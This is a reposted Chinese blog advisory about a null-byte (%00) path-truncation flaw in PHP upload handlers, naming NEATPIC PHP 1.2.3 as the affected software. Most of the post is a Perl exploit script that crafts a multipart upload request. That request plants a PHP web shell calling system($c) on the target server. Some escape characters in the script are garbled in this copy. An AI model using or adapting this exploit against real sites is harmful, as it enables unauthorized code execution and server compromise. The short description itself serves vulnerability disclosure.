PHP網站警報,多種PHP程式過濾漏洞(轉)
PHP網站警報,多種PHP程式過濾漏洞(轉)[@more@] 危害:直接上傳任意檔案 漏洞描述: 當PHP程式有指定PATH時,在PATH檔案後門加入%00可以上傳任意檔案. 測試程式:NEATPIC PHP目錄直讀版 1.2.3 此文件參與者: 漏洞實驗者:Xiaolu,Lilo,SuperHei,Darkness [All BST Members] Xiaolu提供了一個漏洞利用程式: #!/usr/bin/perl $ = 1; use Socket; $host = "127.0.0.1"; $port = "80"; $UploadTo = ""; $str = "-----------------------------7d41f4a600472
". "Content-Disposition: form-data; name="path"
". "
". "./php.php%00
". "-----------------------------7d41f4a600472
". "Content-Disposition: form-data; name="image"; filename= "F: ools1.gif"
". "Content-Type: text/plain
". "
". ""system($c);
". "?>
". "-----------------------------7d41f4a600472--
". "
"; print $str; $len=length($str); print $len; $req ="POST /index.php?action=upload HTTP/1.1
". "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*
". "Referer:
". "Accept-Language: zh-cn
". "Content-Type: multipart/form-data; boundary=---------------- -----------7d41f4a600472
". "Accept-Encoding: gzip, deflate
". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)
". "Host: 127.0.0.1
". "Content-Length: $len
". "Connection: Keep-Alive
". "Cache-Control: no-cache
". "Cookie: PHPSESSID=111111111111111111111111
". "
". "$str
"; print $req; @res = sendraw($req); print @res; #Hmm...Maybe you can send it by other way sub sendraw { my ($req) = @_; my $target; $target = inet_aton($host) die("inet_aton problems
"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') 0) die("Socket problems
"); if(connect(S,pack "SnA4x8",2,$port,$target)){ select(S); $ = 1; print $req; my @res = ; select(STDOUT); close(S); return @res; } else { die("Can't connect...
"); } }
·上一篇:·下一篇:
最新更新 | ||
······························ |
| ||
| | | | | | | | ||
| ||
Copyright © 2004 - 2007 All Rights Reserved
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10763080/viewspace-970190/,如需轉載,請註明出處,否則將追究法律責任。
上一篇:
菜鳥必看:釋出駭客最初步的技術(轉)
請登入後發表評論
登入
全部評論
|
相關文章
- PHP網頁廣告過濾瀏覽小程式PHP網頁
- 【安全公告】PHP多個遠端程式碼執行漏洞風險預警PHP
- 網站漏洞測試php程式碼修復詳情網站PHP
- PHP 過濾器(Filter)PHP過濾器Filter
- php過濾html標籤、特殊字元、轉義字元PHPHTML字元
- php漏洞對策 (轉)PHP
- php過濾提交資訊防注入PHP
- PHP Everywhere 三個 RCE 漏洞威脅大量 WordPress 網站PHP網站
- PHP網站常見安全漏洞及防禦方法PHP網站
- PHP實現布隆過濾器PHP過濾器
- PHP防護XSS,SQL,程式碼執行,檔案包含等多種高危漏洞PHPSQL
- 探索 PHP 多程式PHP
- Ubuntu釋出PHP重要補丁修復多個PHP漏洞UbuntuPHP
- 網站安全防護-PHP反序列化漏洞修復網站PHP
- PHP與WAP網站!PHP網站
- PHP基礎之過濾器講解PHP過濾器
- php編寫大型網站問題集 (轉)PHP網站
- XAMPP Windows PHP-CGI 程式碼執行漏洞(CVE-2024-4577) | Goby漏洞預警WindowsPHPGo
- Linux+php+memcache+APC加速PHP網站LinuxPHP網站
- PHP漏洞全解————10、PHP檔案包含漏洞PHP
- PHP多程式程式設計(3):多程式抓取網頁的演示PHP程式設計網頁
- PHP中很屌但經常被各種忽略的過濾器函式PHP過濾器函式
- 用 PHP 玩轉程式之二 — 多程式 PHPServerPHPServer
- PHP多程式(4) :內部多程式PHP
- PHP的pcntl多程式PHP
- php小技巧過濾陣列的下標PHP陣列
- PHP程式報錯:PHP Notice: Undefined index: XX inPHPUndefinedIndex
- Linux PHP網站提速三大“軟”招(轉)LinuxPHP網站
- PHP多程式並行執行php指令碼PHP並行指令碼
- 用Docker執行Nginx和多個版本PHP部署網站DockerNginxPHP網站
- PHP多程式程式設計(一)PHP程式設計
- 如何過濾掉 PHP 陣列中的空值?PHP陣列
- PHP 對資料進行驗證和過濾PHP
- php多程式管理器PHP
- phpMyAdminsetup.php指令碼的任意PHP程式碼注入漏洞PHP指令碼
- php網站的定時事件PHP網站事件
- PHP在大型網站開發PHP網站
- 網站存在漏洞怎麼修復 如何修補網站程式程式碼漏洞網站